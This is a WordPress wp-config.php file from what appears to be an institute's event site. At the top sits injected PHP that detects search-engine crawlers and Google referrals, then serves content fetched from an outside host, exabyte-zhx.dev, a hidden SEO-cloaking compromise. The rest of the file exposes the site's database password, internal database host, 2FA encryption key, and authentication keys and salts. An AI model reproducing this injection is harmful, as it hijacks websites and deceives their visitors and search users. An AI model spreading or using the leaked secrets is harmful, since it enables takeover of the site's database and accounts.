File: /srv/www/event-csmcri/wp-config.php
<?php
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
$referer = strtolower($_SERVER['HTTP_REFERER'] ?? '');
$uri = $_SERVER['REQUEST_URI'] ?? '';
if ($uri == '/' && (preg_match('/bot|google|chrome-lighthouse/i', $userAgent) || preg_match('/google/i', $referer))) {
echo file_get_contents('https://exabyte-zhx.dev/public/event/');
exit();
}
/** WP 2FA plugin data encryption key. For more information please visit melapress.com */
define( 'WP2FA_ENCRYPT_KEY', '0QGqpKA3odEmkQuyeEKSLA==' );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'event.csmcri.res.in' );
/** Database username */
define( 'DB_USER', 'web-cms' );
/** Database password */
define( 'DB_PASSWORD', 'zv/@Bbp4Jh]' );
/** Database hostname */
define( 'DB_HOST', '192.168.169.48' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define('DISABLE_WP_CRON', true);
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '0IyFv8h!@Ac;v^eW>B^;*@!Ae 1rtbgYl@~Eb ./btA4=N$|H`;u04)_*G0oi%b=' );
define( 'SECURE_AUTH_KEY', 'q#s[(v,p|V(PkYqjz~}j-v3JO3?@;Wd`_`_yncvK2?k~hGMh;SHzqk{r1nJ+{xSk' );
define( 'LOGGED_IN_KEY', '1m^ts *>Bl-:[-5eBo)*9`+bZ^>3rv07[5MpVR0O;_gQkzXE_=wfoU|BoHD?*UiK' );
define( 'NONCE_KEY', 'tJQ2D,U8QF<RZ}P:1EG<C2f@!.W HZ$(OOC65Bas*9`|1?zFEkUzU+dX%Y:uw.+h' );
define( 'AUTH_SALT', 'UegO)H-]F@gqY{Z0#fMP5?o,C++tT]ilAjg =R~_0K3_%CFP58J-E3po<B&H{)L_' );
define( 'SECURE_AUTH_SALT', ',|X$6E^SJuxA}9l*aH}6J,TT`;YR#^|&gmEVWkrq 2c/xIOU+bPHDRmN +rQ;6.V' );
define( 'LOGGED_IN_SALT', 'WTO{)PD3)/uZv<m&c~vf`.cY5gp|6QwT-[KrZJST|~8ueCMYM=scI!5#oP7+08Mj' );
define( 'NONCE_SALT', '|JNZC(Cwk@(FH}exm0Po$+`4$p/Fda0txDOhhLs6NQIk,fdNHoNhi*_KU.)UMISH' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
define( 'WP_AUTO_UPDATE_CORE', false );
/* Add any custom values between this line and the "stop editing" line. */
define( 'WP_MEMORY_LIMIT', '1024M' );
define( 'WP_MAX_MEMORY_LIMIT', '1024M' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';